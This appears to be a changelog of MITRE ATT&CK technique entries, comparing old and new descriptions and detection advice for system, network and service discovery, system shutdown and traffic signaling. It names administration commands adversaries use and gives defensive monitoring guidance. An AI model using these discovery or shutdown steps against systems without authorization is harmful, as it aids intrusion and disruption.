>m information. If running with privileged access, a breakdow>m information. If running with privileged access, a breakdow
>n of system data can be gathered through the <code>systemset>n of system data can be gathered through the <code>systemset
>up</code> configuration tool on macOS. As an example, advers>up</code> configuration tool on macOS. As an example, advers
>aries with user-level access can execute the <code>df -aH</c>aries with user-level access can execute the <code>df -aH</c
>ode> command to obtain currently mounted disks and associate>ode> command to obtain currently mounted disks and associate
>d freely available space. [System Information Discovery](htt>d freely available space. Adversaries may also leverage a [N
>ps://attack.mitre.org/techniques/T1082) combined with inform>etwork Device CLI](https://attack.mitre.org/techniques/T1059
>ation gathered from other forms of discovery and reconnaissa>/008) on network devices to gather detailed system informati
>nce can drive payload development and concealment.(Citation:>on (e.g. <code>show version</code>).(Citation: US-CERT-TA18-
> OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniqu>106A) [System Information Discovery](https://attack.mitre.or
>es)  Infrastructure as a Service (IaaS) cloud providers such>g/techniques/T1082) combined with information gathered from 
> as AWS, GCP, and Azure allow access to instance and virtual>other forms of discovery and reconnaissance can drive payloa
> machine information via APIs. Successful authenticated API >d development and concealment.(Citation: OSX.FairyTale)(Cita
>calls can return data such as the operating system platform >tion: 20 macOS Common Tools and Techniques)  Infrastructure 
>and status of a particular instance or the model view of a v>as a Service (IaaS) cloud providers such as AWS, GCP, and Az
>irtual machine.(Citation: Amazon Describe Instance)(Citation>ure allow access to instance and virtual machine information
>: Google Instances Resource)(Citation: Microsoft Virutal Mac> via APIs. Successful authenticated API calls can return dat
>hine API)>a such as the operating system platform and status of a part
 >icular instance or the model view of a virtual machine.(Cita
 >tion: Amazon Describe Instance)(Citation: Google Instances R
 >esource)(Citation: Microsoft Virutal Machine API)

Dropped Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAmazon. (n.d.). describe-instance-information. Retrieved March 3, 2020.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
external_referencesCAPEC-312
values_changed
STIX FieldOld valueNew Value
modified2021-10-13 23:21:27.750000+00:002022-09-06 22:11:56.413000+00:00
descriptionAn adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques) Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. show version).(Citation: US-CERT-TA18-106A) [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques) Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)
external_references[1]['source_name']capecAmazon Describe Instance
external_references[1]['url']https://capec.mitre.org/data/definitions/312.htmlhttps://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
external_references[2]['source_name']OSX.FairyTaleGoogle Instances Resource
external_references[2]['description']Phile Stokes. (2018, September 20). On the Trail of OSX.FairyTale | Adware Playing at Malware. Retrieved August 24, 2021.Google. (n.d.). Rest Resource: instance. Retrieved March 3, 2020.
external_references[2]['url']https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/https://cloud.google.com/compute/docs/reference/rest/v1/instances
external_references[3]['source_name']20 macOS Common Tools and TechniquesMicrosoft Virutal Machine API
external_references[3]['description']Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.Microsoft. (2019, March 1). Virtual Machines - Get. Retrieved October 8, 2019.
external_references[3]['url']https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get
external_references[4]['source_name']Amazon Describe Instance20 macOS Common Tools and Techniques
external_references[4]['description']Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020.Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
external_references[4]['url']https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.htmlhttps://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
external_references[5]['source_name']Google Instances ResourceOSX.FairyTale
external_references[5]['description']Google. (n.d.). Rest Resource: instance. Retrieved March 3, 2020.Phile Stokes. (2018, September 20). On the Trail of OSX.FairyTale | Adware Playing at Malware. Retrieved August 24, 2021.
external_references[5]['url']https://cloud.google.com/compute/docs/reference/rest/v1/instanceshttps://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/
external_references[6]['source_name']Microsoft Virutal Machine APIUS-CERT-TA18-106A
external_references[6]['description']Microsoft. (2019, March 1). Virtual Machines - Get. Retrieved October 8, 2019.US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.
external_references[6]['url']https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/gethttps://www.us-cert.gov/ncas/alerts/TA18-106A
x_mitre_detectionSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to gather detailed system information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.
x_mitre_version2.32.5
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/312.html', 'external_id': 'CAPEC-312'}
x_mitre_contributorsAustin Clark, @c2defense
x_mitre_data_sourcesProcess: Process Creation
x_mitre_platformsNetwork
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T1016] System Network Configuration Discovery

Current version: 1.5

Version changed from: 1.3 → 1.5


Old Description
New Description
t1Adversaries may look for details about the network configurat1Adversaries may look for details about the network configura
>tion and settings, such as IP and/or MAC addresses, of syste>tion and settings, such as IP and/or MAC addresses, of syste
>ms they access or through information discovery of remote sy>ms they access or through information discovery of remote sy
>stems. Several operating system administration utilities exi>stems. Several operating system administration utilities exi
>st that can be used to gather this information. Examples inc>st that can be used to gather this information. Examples inc
>lude [Arp](https://attack.mitre.org/software/S0099), [ipconf>lude [Arp](https://attack.mitre.org/software/S0099), [ipconf
>ig](https://attack.mitre.org/software/S0100)/[ifconfig](http>ig](https://attack.mitre.org/software/S0100)/[ifconfig](http
>s://attack.mitre.org/software/S0101), [nbtstat](https://atta>s://attack.mitre.org/software/S0101), [nbtstat](https://atta
>ck.mitre.org/software/S0102), and [route](https://attack.mit>ck.mitre.org/software/S0102), and [route](https://attack.mit
>re.org/software/S0103).  Adversaries may use the information>re.org/software/S0103).  Adversaries may also leverage a [Ne
> from [System Network Configuration Discovery](https://attac>twork Device CLI](https://attack.mitre.org/techniques/T1059/
>k.mitre.org/techniques/T1016) during automated discovery to >008) on network devices to gather information about configur
>shape follow-on behaviors, including determining certain acc>ations and settings, such as IP addresses of configured inte
>ess within the target network and what actions to do next. >rfaces and static/dynamic routes (e.g. <code>show ip route</
 >code>, <code>show ip interface</code>).(Citation: US-CERT-TA
 >18-106A)(Citation: Mandiant APT41 Global Intrusion )  Advers
 >aries may use the information from [System Network Configura
 >tion Discovery](https://attack.mitre.org/techniques/T1016) d
 >uring automated discovery to shape follow-on behaviors, incl
 >uding determining certain access within the target network a
 >nd what actions to do next. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Austin Clark, @c2defense']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesGyler, C.,Perez D.,Jones, S.,Miller, S.. (2021, February 25). This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved February 17, 2022.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
external_referencesCAPEC-309
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 00:17:37.881000+00:002022-09-06 22:32:35.833000+00:00
descriptionAdversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103). Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. show ip route, show ip interface).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion ) Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.
external_references[1]['source_name']capecMandiant APT41 Global Intrusion
external_references[1]['url']https://capec.mitre.org/data/definitions/309.htmlhttps://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits
x_mitre_data_sources[0]Process: Process CreationProcess: OS API Execution
x_mitre_data_sources[1]Script: Script ExecutionProcess: Process Creation
x_mitre_data_sources[3]Process: OS API ExecutionScript: Script Execution
x_mitre_detectionSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
x_mitre_version1.31.5
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/309.html', 'external_id': 'CAPEC-309'}
x_mitre_platformsNetwork

[T1049] System Network Connections Discovery

Current version: 2.4

Version changed from: 2.2 → 2.4


Old Description
New Description
t1Adversaries may attempt to get a listing of network connectit1Adversaries may attempt to get a listing of network connecti
>ons to or from the compromised system they are currently acc>ons to or from the compromised system they are currently acc
>essing or from remote systems by querying for information ov>essing or from remote systems by querying for information ov
>er the network.   An adversary who gains access to a system >er the network.   An adversary who gains access to a system 
>that is part of a cloud-based environment may map out Virtua>that is part of a cloud-based environment may map out Virtua
>l Private Clouds or Virtual Networks in order to determine w>l Private Clouds or Virtual Networks in order to determine w
>hat systems and services are connected. The actions performe>hat systems and services are connected. The actions performe
>d are likely the same types of discovery techniques dependin>d are likely the same types of discovery techniques dependin
>g on the operating system, but the resulting information may>g on the operating system, but the resulting information may
> include details about the networked cloud environment relev> include details about the networked cloud environment relev
>ant to the adversary's goals. Cloud providers may have diffe>ant to the adversary's goals. Cloud providers may have diffe
>rent ways in which their virtual networks operate.(Citation:>rent ways in which their virtual networks operate.(Citation:
> Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Net> Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Net
>work Overview)(Citation: Google VPC Overview)  Utilities and>work Overview)(Citation: Google VPC Overview) Similarly, adv
> commands that acquire this information include [netstat](ht>ersaries who gain access to network devices may also perform
>tps://attack.mitre.org/software/S0104), "net use," and "net > similar discovery activities to gather information about co
>session" with [Net](https://attack.mitre.org/software/S0039)>nnected systems and services.  Utilities and commands that a
>. In Mac and Linux, [netstat](https://attack.mitre.org/softw>cquire this information include [netstat](https://attack.mit
>are/S0104) and <code>lsof</code> can be used to list current>re.org/software/S0104), "net use," and "net session" with [N
> connections. <code>who -a</code> and <code>w</code> can be >et](https://attack.mitre.org/software/S0039). In Mac and Lin
>used to show which users are currently logged in, similar to>ux, [netstat](https://attack.mitre.org/software/S0104) and <
> "net session".>code>lsof</code> can be used to list current connections. <c
 >ode>who -a</code> and <code>w</code> can be used to show whi
 >ch users are currently logged in, similar to "net session". 
 >Additionally, built-in features native to network devices an
 >d [Network Device CLI](https://attack.mitre.org/techniques/T
 >1059/008) may be used (e.g. <code>show ip sockets</code>, <c
 >ode>show tcp brief</code>).(Citation: US-CERT-TA18-106A)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator']
values_changed
STIX FieldOld valueNew Value
modified2021-03-08 10:33:01.083000+00:002022-09-06 22:35:34.231000+00:00
descriptionAdversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to "net session".Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services. Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. show ip sockets, show tcp brief).(Citation: US-CERT-TA18-106A)
x_mitre_detectionSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
x_mitre_version2.22.4
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'}
x_mitre_contributorsAustin Clark, @c2defense
x_mitre_platformsNetwork

[T1007] System Service Discovery

Current version: 1.4

Version changed from: 1.2 → 1.4


Old Description
New Description
t1Adversaries may try to get information about registered servt1Adversaries may try to gather information about registered l
>ices. Commands that may obtain information about services us>ocal system services. Adversaries may obtain information abo
>ing operating system utilities are "sc," "tasklist /svc" usi>ut services using tools as well as OS utility commands such 
>ng [Tasklist](https://attack.mitre.org/software/S0057), and >as <code>sc query</code>, <code>tasklist /svc</code>, <code>
>"net start" using [Net](https://attack.mitre.org/software/S0>systemctl --type=service</code>, and <code>net start</code>.
>039), but adversaries may also use other tools as well. Adve>  Adversaries may use the information from [System Service D
>rsaries may use the information from [System Service Discove>iscovery](https://attack.mitre.org/techniques/T1007) during 
>ry](https://attack.mitre.org/techniques/T1007) during automa>automated discovery to shape follow-on behaviors, including 
>ted discovery to shape follow-on behaviors, including whethe>whether or not the adversary fully infects the target and/or
>r or not the adversary fully infects the target and/or attem> attempts specific actions.
>pts specific actions. 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Harshal Tupsamudre, Qualys']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator', 'SYSTEM']
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 14:10:36.992000+00:002022-07-15 13:35:54.740000+00:00
descriptionAdversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query, tasklist /svc, systemctl --type=service, and net start. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
x_mitre_version1.21.4
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: OS API Execution
x_mitre_platformsLinux

[T1529] System Shutdown/Reboot

Current version: 1.2

Version changed from: 1.0 → 1.2


Old Description
New Description
t1Adversaries may shutdown/reboot systems to interrupt access t1Adversaries may shutdown/reboot systems to interrupt access 
>to, or aid in the destruction of, those systems. Operating s>to, or aid in the destruction of, those systems. Operating s
>ystems may contain commands to initiate a shutdown/reboot of>ystems may contain commands to initiate a shutdown/reboot of
> a machine. In some cases, these commands may also be used t> a machine or network device. In some cases, these commands 
>o initiate a shutdown/reboot of a remote computer.(Citation:>may also be used to initiate a shutdown/reboot of a remote c
> Microsoft Shutdown Oct 2017) Shutting down or rebooting sys>omputer or network device via [Network Device CLI](https://a
>tems may disrupt access to computer resources for legitimate>ttack.mitre.org/techniques/T1059/008) (e.g. <code>reload</co
> users.  Adversaries may attempt to shutdown/reboot a system>de>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert
> after impacting it in other ways, such as [Disk Structure W>_TA18_106A) Shutting down or rebooting systems may disrupt a
>ipe](https://attack.mitre.org/techniques/T1561/002) or [Inhi>ccess to computer resources for legitimate users.  Adversari
>bit System Recovery](https://attack.mitre.org/techniques/T14>es may attempt to shutdown/reboot a system after impacting i
>90), to hasten the intended effects on system availability.(>t in other ways, such as [Disk Structure Wipe](https://attac
>Citation: Talos Nyetya June 2017)(Citation: Talos Olympic De>k.mitre.org/techniques/T1561/002) or [Inhibit System Recover
>stroyer 2018)>y](https://attack.mitre.org/techniques/T1490), to hasten the
 > intended effects on system availability.(Citation: Talos Ny
 >etya June 2017)(Citation: Talos Olympic Destroyer 2018)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Austin Clark, @c2defense']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator', 'root', 'SYSTEM']
values_changed
STIX FieldOld valueNew Value
modified2020-03-27 21:18:48.149000+00:002022-10-20 18:27:57.587000+00:00
descriptionAdversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users. Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users. Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)
external_references[1]['source_name']Microsoft Shutdown Oct 2017Talos Nyetya June 2017
external_references[1]['description']Microsoft. (2017, October 15). Shutdown. Retrieved October 4, 2019.Chiu, A. (2016, June 27). New Ransomware Variant "Nyetya" Compromises Systems Worldwide. Retrieved March 26, 2019.
external_references[1]['url']https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdownhttps://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html
external_references[2]['source_name']Talos Nyetya June 2017alert_TA18_106A
external_references[2]['description']Chiu, A. (2016, June 27). New Ransomware Variant "Nyetya" Compromises Systems Worldwide. Retrieved March 26, 2019.CISA. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved February 14, 2022.
external_references[2]['url']https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.htmlhttps://www.cisa.gov/uscert/ncas/alerts/TA18-106A
x_mitre_detectionUse process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006.Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006. Unexpected or unauthorized commands from network cli on network devices may also be associated with shutdown/reboot, e.g. the reload command.
x_mitre_version1.01.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft Shutdown Oct 2017', 'description': 'Microsoft. (2017, October 15). Shutdown. Retrieved October 4, 2019.', 'url': 'https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown'}
x_mitre_data_sourcesProcess: Process Creation
x_mitre_platformsNetwork
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T1205] Traffic Signaling

Current version: 2.4

Version changed from: 2.2 → 2.4


Old Description
New Description
t1Adversaries may use traffic signaling to hide open ports or t1Adversaries may use traffic signaling to hide open ports or 
>other malicious functionality used for persistence or comman>other malicious functionality used for persistence or comman
>d and control. Traffic signaling involves the use of a magic>d and control. Traffic signaling involves the use of a magic
> value or sequence that must be sent to a system to trigger > value or sequence that must be sent to a system to trigger 
>a special response, such as opening a closed port or executi>a special response, such as opening a closed port or executi
>ng a malicious task. This may take the form of sending a ser>ng a malicious task. This may take the form of sending a ser
>ies of packets with certain characteristics before a port wi>ies of packets with certain characteristics before a port wi
>ll be opened that the adversary can use for command and cont>ll be opened that the adversary can use for command and cont
>rol. Usually this series of packets consists of attempted co>rol. Usually this series of packets consists of attempted co
>nnections to a predefined sequence of closed ports (i.e. [Po>nnections to a predefined sequence of closed ports (i.e. [Po
>rt Knocking](https://attack.mitre.org/techniques/T1205/001))>rt Knocking](https://attack.mitre.org/techniques/T1205/001))
>, but can involve unusual flags, specific strings, or other >, but can involve unusual flags, specific strings, or other 
>unique characteristics. After the sequence is completed, ope>unique characteristics. After the sequence is completed, ope
>ning a port may be accomplished by the host-based firewall, >ning a port may be accomplished by the host-based firewall, 
>but could also be implemented by custom software.  Adversari>but could also be implemented by custom software.  Adversari
>es may also communicate with an already open port, but the s>es may also communicate with an already open port, but the s
>ervice listening on that port will only respond to commands >ervice listening on that port will only respond to commands 
>or trigger other malicious functionality if passed the appro>or trigger other malicious functionality if passed the appro
>priate magic value(s).  The observation of the signal packet>priate magic value(s).  The observation of the signal packet
>s to trigger the communication can be conducted through diff>s to trigger the communication can be conducted through diff
>erent methods. One means, originally implemented by Cd00r (C>erent methods. One means, originally implemented by Cd00r (C
>itation: Hartrell cd00r 2002), is to use the libpcap librari>itation: Hartrell cd00r 2002), is to use the libpcap librari
>es to sniff for the packets in question. Another method leve>es to sniff for the packets in question. Another method leve
>rages raw sockets, which enables the malware to use ports th>rages raw sockets, which enables the malware to use ports th
>at are already open for use by other programs.  On network d>at are already open for use by other programs.  On network d
